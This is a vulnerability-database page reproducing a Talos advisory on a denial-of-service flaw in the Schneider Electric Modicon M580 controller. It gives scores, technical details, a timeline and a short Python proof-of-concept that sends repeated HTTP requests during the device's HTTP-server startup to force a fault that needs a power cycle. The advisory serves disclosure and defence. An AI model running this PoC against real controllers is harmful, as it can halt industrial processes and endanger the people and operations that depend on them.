Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
talosTalos IntelligenceTALOS-2019-0808
HistoryAug 13, 2019 - 12:00 a.m.

Schneider Electric Modicon M580 HTTP Request Denial of Service Vulnerability

2019-08-1300:00:00
Talos Intelligence
www.talosintelligence.com
28

7.1 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:N/I:N/A:C

5.9 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

0.001 Low

EPSS

Percentile

42.7%

JSON

Summary

An exploitable denial of service vulnerability exists in the HTTP request processing of the Schneider Electric Modicon M580 Programmable Automation Controller firmware version SV2.70. An appropriately timed HTTP request can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

Tested Versions

Schneider Electric Modicon M580 BMEP582040 SV2.70

Product URLs

<https://www.schneider-electric.com/en/work/campaign/m580-epac/&gt;

CVSSv3 Score

5.9 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-248: Uncaught Exception

Details

The Modicon M580 is the latest in Schneider Electric’s Modicon line of Programmable Automation Controllers. The device boasts a Wurldtech Achilles Level 2 certification and global policy controls to quickly enforce various security configurations. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus, and a management protocol referred to as UMAS.

When a HTTP request to an existing resource is sent during the intialization process of the device’s HTTP server, it is possible to make the device enter a non-recoverable fault state, causing a denial of service condition.

In the non-recoverable fault state the CPU has entered an error mode where all remote communications have been stopped, process logic stops execution, and the device requires a physical power cycle to regain functionality.

Exploit Proof of Concept

import requests
from time import sleep
 
def main():
    rhost = "192.168.10.1"
    uri = "http://%s/cabs/RdePocket.CAB" % (rhost)
    max_tries = 100
    results = []
    for i in xrange(max_tries):
        try:
            res = requests.get(uri, timeout=10)
            results.append(res)
        except:
            sleep(0.1)
 
if __name__ == '__main__':
    main()

Timeline

2019-04-10 - Vendor Disclosure 2019-08-13 - Vendor Patched; Public Release

Related

nvd 1
cve 1
nessus 2
prion 1
cvelist 1
nvd
nvd
CVE-2019-6830
2019-09-17 20:15:12
cve
cve
CVE-2019-6830
2019-09-17 20:15:12
nessus
nessus
Schneider Electric Modicon Improper Handling of Exceptional Conditions (CVE-2019-6830)
2022-02-07 00:00:00
Schneider-electric Modicon Improper Handling of Exceptional Conditions
2019-11-08 00:00:00
prion
prion
Design/Logic Flaw
2019-09-17 20:15:00
cvelist
cvelist
CVE-2019-6830
2019-09-17 19:21:12

7.1 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:N/I:N/A:C

5.9 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

0.001 Low

EPSS

Percentile

42.7%

JSON
Related for TALOS-2019-0808
nvd1cve1nessus2prion1cvelist1